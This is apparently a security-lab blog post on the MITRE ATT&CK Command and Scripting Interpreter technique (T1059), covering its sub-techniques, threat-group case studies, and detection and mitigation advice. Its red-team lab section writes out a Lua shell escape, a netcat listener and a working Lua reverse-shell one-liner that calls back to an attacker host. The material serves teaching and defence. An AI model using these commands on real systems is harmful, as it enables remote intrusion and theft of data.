Bengaluru, Karnataka, INDIA 560042
+91-9784367546, +91-8839669785
support@cyberwarfare.live

Command and Scripting Interpreter (T1059)

A Real World Adversary Labs

Command and Scripting Interpreter (T1059)

Overview:

What is an interpreter??

According to computer science, “Interpreter is a computer program that executes the instructions present in a program or scripting language, without the need of compiling it beforehand i.e. converting it into a machine/byte code.

We have a  number of interpreted languages like Perl, Python,Matlab, Lua, JavaScript and etc.

What are command and scripting interpreters??

Command interpreters, name itself suggests that interpretation is done based on the commands issued by the user in an interactive mode or through the commands present in the program. For example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.  

Let’s look at the formal definition, according to the geeks “ a command interpreter is a part of an operating system that understands and executes commands that are entered interactively by a human being or from a program”.

  • In some cases it  is called a shell. 
  • Here the interaction takes place in the form of text lines.

Let’s have a look at the scripting interpreters??

A script is a list of commands that are executed by a certain program or scripting engines. Scripts are used to automate processes. For example, we have scripting languages like JavaScript, ASP, JSP, PHP, Perl, Tcl and Python

So scripting interpreters, are the programs that interpret the commands present in a script for execution, without the need for compilation.  

We even have cross-platform interpreters such as Python, these are commonly associated with client applications such as JavaScript/JScript and Visual Basic.

What are the advantages of using interpreters??

These interpreters were frequently used until the 1970s. However, in modern times many interpreters are replaced by graphical user interfaces and menu-driven interfaces.

But still, hackers, researchers and other geeks prefer CLI environment because of its advantages like:

  • We have an abundant list of commands and queries available.
  • It is much faster to type than to click as is done using graphical user interfaces..
  • There are some systems that don’t have enough resources to support graphical user interfaces in those cases, command interpreters can be used.
  • It provides an interactive shell making the commands more effective. For example:
    • PHP has a shell for interactive use which is called php-cli.
    • Ruby has a command shell for interactive use.
  • It requires less memory (Random Access Memory) to operate.
  • Interpreters do not require operating systems like Windows to run.

As it is a fact that everything in this universe has small loopholes and people are behind those to achieve some profits exploiting them.

In this way adversaries may take advantage of these technologies and abuse them in various ways as a means of executing arbitrary commands. As all the above mentioned interpreters i.e. command interpreters and scripting interpreters are pre-installed in the machines providing a wide surface to attack, as a result it becomes easy to exploit them. They can execute commands through interactive terminals/shells or Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. 

What are the Sub- techniques of Command and Scripting Interpreter??

We have seven sub techniques available, lets have look at them:

  1.  PowerShell(T1059.001):

Powershell is a cross-platform configuration management framework.  When it was released in 2006, this powerful tool essentially replaced Command Prompt as the default way to automate batch processes and create customized system management tools.

  • Designed for task automation.
  • Consists a command-line shell and scripting language included in the Windows operating system. 
  • PowerShell may also be used to download and run executables from the Internet.
  • PowerShell has become so popular with administrators, pentesters, and hackers. Because it is:
    • Native to Windows
    • Able to call the Windows API
    • Able to run commands without writing to the disk
    • Able to avoid detection by Anti-virus
    • Already flagged as “trusted” by most application white list solutions
    • A medium used to write many open source Pentest toolkits

We have number  of tools for offensive testing of the powershell like:

  • Empire: It is an Open source, cross-platform remote administration tool and post-exploitation framework, available on GitHub.
    • According to public hacking tools, this tool is widely used by adversaries to run PowerShell scripts in memory and get a reverse connection.
  • PowerSploit:  It is an open source, offensive security framework consisting of Powershell modules and scripts.
    • These scripts and modules perform tasks related to penetration testing like code execution, persistence, bypassing anti-virus, recon, and exfiltration.
  • PoshC2: It is also an Open source, cross-platform remote administration tool and post-exploitation framework, available on GitHub.
    •   This tool helps in Red teaming,post-exploitation and lateral movement.
  • PSAttack:  It is a self contained custom PowerShell console.
    • To evade antivirus and Incident Response teams. 

All these features can be abused by the adversaries. They  can use it to perform a number of actions, like discovery of information and execution of code. 

We can use commands like:

  • Start-Process can be used to run an executable.
  • Invoke-Command helps to run a command locally or on a remote computer.

(NOTE: Administrator permissions are required to use PowerShell to connect to remote systems)

  1. Applescript(T1059.002):

AppleScript is a scripting language developed by Apple Inc. for the Macintosh operating system(macOS).  

  • It is used to automate processes on the Mac operating system written in simple English-like language.
  • Designed to control applications and parts of the OS via inter-application messages called AppleEvents.
  • Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python.

Advantages of ApplEvents are:

  • These AppleEvent messages can be easily scripted with AppleScript for local or remote execution.
  • Can be sent independently or as part of a script. 
  • These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

 Scripts can be run from the command-line via 

osascript /path/to/script or osascript -e "script here"
  • osascript : this command executes AppleScript and any other Open Scripting Architecture (OSA) language scripts.
  • osalang: It lists OSA languages installed on a system. 

Adversaries can abuse this AppleScript for execution. They can execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes.

(NOTE: These events cannot start applications remotely (they can start them locally though), but can interact with applications if they’re already running remotely.)

  1. Windows Command Shell(T1059.003):

The Windows command shell (cmd.exe) is the primary command prompt on Windows systems. 

  • This program is used to execute the entered commands, perform advanced administrative functions, solve certain types of Windows issues and automate tasks via scripts and batch files. Batch files (like .bat or .cmd) provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.
  • A batch file can be used for 
    • long or repetitive tasks, or
    • to run the same set of commands on multiple systems.
  • The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.

Adversaries may leverage cmd.exe to execute various commands and payloads. They may use it in following ways:

  •  cmd.exe /c to execute a single command, or 
  • They may abuse cmd.exe interactively with input and output forwarded over a command and control channel.
  1. 4. Unix Shell(T1059.004):

A Unix shell is a command-line interpreter or shell that provides a command line user interface for Unix-like operating systems like Linux and macOS systems. There exists many variations of the Unix shell like sh, bash, zsh, etc. depending on the specific OS or distribution. 

  • The shell is both an interactive command language and a scripting language, and is used to control the execution of the system using shell scripts.
  • Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
  • Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops.
  • Shell scripts can be used for:
    • long or repetitive tasks, or
    • to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. They will try to achieve Interactive shells through command and control channels or during lateral movement with the use of  SSH. They may also leverage shell scripts to:

  • Deliver and execute multiple commands on victims or 
  • Deliver  payloads used for persistence.
  1. 5. Visual Basic (T1059.005):

Visual basic is a programming language from Microsoft known for its Component Object Model programming model. VB is integrated and supported in the .NET Framework and cross-platform .NET Core.

We have a few derived languages for VB such as uch as Visual Basic for Applications (VBA) and VBScript.

  • Visual Basic for Applications(VBA) can be used to create macros for automating repetitive word- and data-processing functions, and generate custom forms, graphs, and reports.
  • VBScript is a default scripting language on Windows hosts and can  be used in place of JavaScript/JScript on HTML Application (HTA) web pages served to Internet Explorer.

(NOTE: Most of the modern browsers do not come with VBScript support).

Adversaries may use VB payloads to execute malicious commands. For example they may:

  •  Automate the malicious execution of behaviors with VBScript or, 
  • Embed VBA content into Spear Phishing Attachment(malware attached) payloads.
  1. Python(T1059.006):

Python  is an interpreted, high-level, general-purpose programming language. A very popular scripting/programming language, with capabilities to perform many functions. It is used for: 

  • developing desktop GUI applications, 
  • websites and web applications. 
  • Automate specific series of tasks, making it more efficient. 
  • Used in the shells of operating systems.

It can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executable s. Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. 

Adversaries take advantage of these libraries to download and execute commands or other scripts, which results in performing various malicious behaviors.

  1. JavaScript/JScript(T1059.007):

 JavaScript (JS) is a platform-agnostic scripting language (compiled just-in-time at runtime) commonly associated with scripts in web pages. Many non-browser environments also use it, such as Node.js, Apache CouchDB and Adobe Acrobat. It  can be executed in runtime environments outside the browser. 

It is integrated with many components of Windows such as the Component Object Model and Internet Explorer HTML Application (HTA) pages.

Adversaries may abuse JavaScript / JScript to execute various behaviors. For example:

  • They can host malicious scripts on websites as part of a Drive-by Compromise or download and execute these script files as secondary payloads. 
  • As these payloads are text-based, it is also very common for adversaries to obfuscate(confuse with ) their content as part of Obfuscated Files or Information.

Case Studies:

APT32:

Also known as OceanLotus Group, Ocean Lotus, OceanLotus, Cobalt Kitty.

These Cyber espionage actors, designated by FireEye as APT32 (OceanLotus Group), carry out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia.

It utilizes multiple methods to infect devices with persistent malware that can hide dormant in a device without the user being aware. One process is through targeted spear-phishing attacks. Mass emails are sent to target organizations, with attachments or links containing malicious files that trigger an infection chain, installing an OceanLotus backdoor.

APT32 is widely known to use such social engineering techniques to trick a user into enabling macros, after which a file downloads multiple malicious payloads from remote servers.

It has used COM scriptlets to download Cobalt Strike beacons.

FIN5:

FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian.

 The cybercriminal group is tied to numerous payment card breaches including Goodwill and best known by its so-called “RawPOS” malware that employed legitimate user credentials to access its targets’ networks.

The RawPOS memory scraper malware has been infecting the lodging industry in epidemic proportions over the past year, and is considered one of the first memory scrapers to target point-of-sale systems. 

One of the most unique things about FIN5 is that in every intrusion, where FIN5 has been active, legitimate access was identified. They had valid user credentials to remotely log into the network. It uses real credentials from the victim organization’s virtual private network, Remote Desktop Protocol, Citrix, or VNC. According to a research  by FirEye, the attackers got those credentials via third parties associated with the victims’ POS systems.

These threat groups scan processes on all victim systems in the environment and use automated scripts to pull back the results.

Whitefly:

Whitefly cyber criminal group that has been active since at least 2017 and it targets organizations in various sectors like telecommunications, healthcare, engineering and media. Most of these companies are based in Singapore. This threat group is  primarily interested in stealing a large amount of sensitive information.

Whitefly compromises their victims using both custom malware and open-source hacking tools. It also uses living off the land tactics, such as malicious Powershell scripts to launch its attack.

It uses a simple remote shell tool that will call back to the C2 server and wait for commands. The general infection process of Whitefly is initiated by using a dropper that arrives in the form of malicious .exe or .dll files. In order to evade suspicion, these files are distributed as documents or images and purport to offer information on job openings. Once the dropper is opened, it runs a loader known as Trojan.Vcrodat on the computer. It has consistently used search order hijacking technique, it has an advantage that Windows does not require an application to provide a specific path for a DLL that it wishes to load.

Threat, Vulnerability and Impact:

Let us have a look at following scheduler tasks threat vulnerability and its impact:

Threat:

Malicious scripts, download malware infected files and executables.

Vulnerability: 

Root privileges given to a normal user through these scripting interpreters.

Impact:

Lateral movement, Enterprise compromise.

Lab Architecture:

Red team: Attack Scenario

Goal: To achieve a reverse shell from our target victim.

Let’s assume that we have access to our victim machine using one of the initial access techniques(mentioned in our previous blogs). Now, we try to find any of the installed scripting interpreters.

We can use the following commands:

apt-cache stats -->>  this gives the statistics of all the installed packages.
apt-cache stats –>> output

As we can see it consists of a number of packages. It’s difficult to search manually. For this we can use the below mentioned command, to search for specific packages installed.

Apt-cache search <package name>

Let’s assume our victim may have installed lua. We can verify its installation using the below command.

apt-cache search lua

Note: we can filter or reduce the amount of output generated using [-n: names only]

apt-cache search lua –>> output

We find our victim has installed lua,  we can exploit it by issuing a reverse shell using the below commands.

Scenario 1: using bash command to get the reverse shell.

lua -e 'os.execute("/bin/sh")'

It can be used to break out from restricted environments by spawning an interactive system shell.

For example:

gathering sensitive information using a reverse shell

Scenario 2: we try to get a reverse shell using a non-interactive reverse shell.

Step 1: Install lua package from lua.org (we have installed lua5.1)

Step 2: To run the script, we should have an additional package called lus-socket (It provides high level access to the system’s or device’s TCP/IP stack)

NOTE: Download luasocket 2.0.2, since it is compatible with above lua package 5.1 and platform independent i.e. can be executed on Windows XP, Linux, and Mac OS X.

Now, we are good to go!!!

Step 3: Start listening on specific port using nc ( -l: listen -p: port number)

nc -l -p 12345
listening on port 12345 using nc

Step 4: Now, run the lua script by specifying the RHOST and RPORT.

export RHOST=192.169.x.x
export RPORT=12345
lua -e 'local s=require("socket");
  local t=assert(s.tcp());
  t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
  while true do
    local r,x=t:receive();local f=assert(io.popen(r,"r"));
    local b=assert(f:read("*a"));t:send(b);
  end;
  f:close();t:close();'
lua script to get non-interactive reverse shell

Step 5: Now, navigate to the terminal where netcat is listening i.e. waiting to get the reverse shell. 

And extract all the sensitive information, required for further exploitation. 

gathered information from the victim machine.

Detection:

  • Activities can be captured through proper logging of process execution with command-line arguments.
    • This information can be useful in gaining additional insight to adversaries’ actions like how they use native processes or custom tools for exploitation
  • Monitor for loading of modules associated with specific languages.
  • If we have restricted the scripting for normal users, then any attempt to enable scripts running on a system would be considered suspicious.
  • If scripts are not generally used, but are enabled then scripts running out of cycle from patching or other administrator functions are suspicious.
  • Scripts should be captured from the file system which helps to determine the adversaries actions and intent.
    • Actions may be related to network and system information discovery, collection, or 
    • other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
  • Monitor processes and command-line arguments for script execution and subsequent behavior.

Mitigation:

  • Anti-virus can be used to automatically restrict suspicious files.
    • Use signatures or heuristics to detect malicious software
  • Permit only the execution of signed scripts
    • Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
  • Disable or remove any unnecessary or unused shells or interpreters.
    • Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
  • Use application control where appropriate.
    • Block execution of code on a system through application control, and/or script blocking
  • Restrict PowerShell execution policy to administrators.
    • Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root
    • Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.
  • Use Script blocking extensions to prevent the execution of scripts and HTA files, commonly used in exploitation processes.
    •  Adblockers can help prevent code from executing in the first place.
  • Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc
Chaithanya C
Security Researcher

Tags: , , ,

Leave a Reply

Your email address will not be published. Required fields are marked *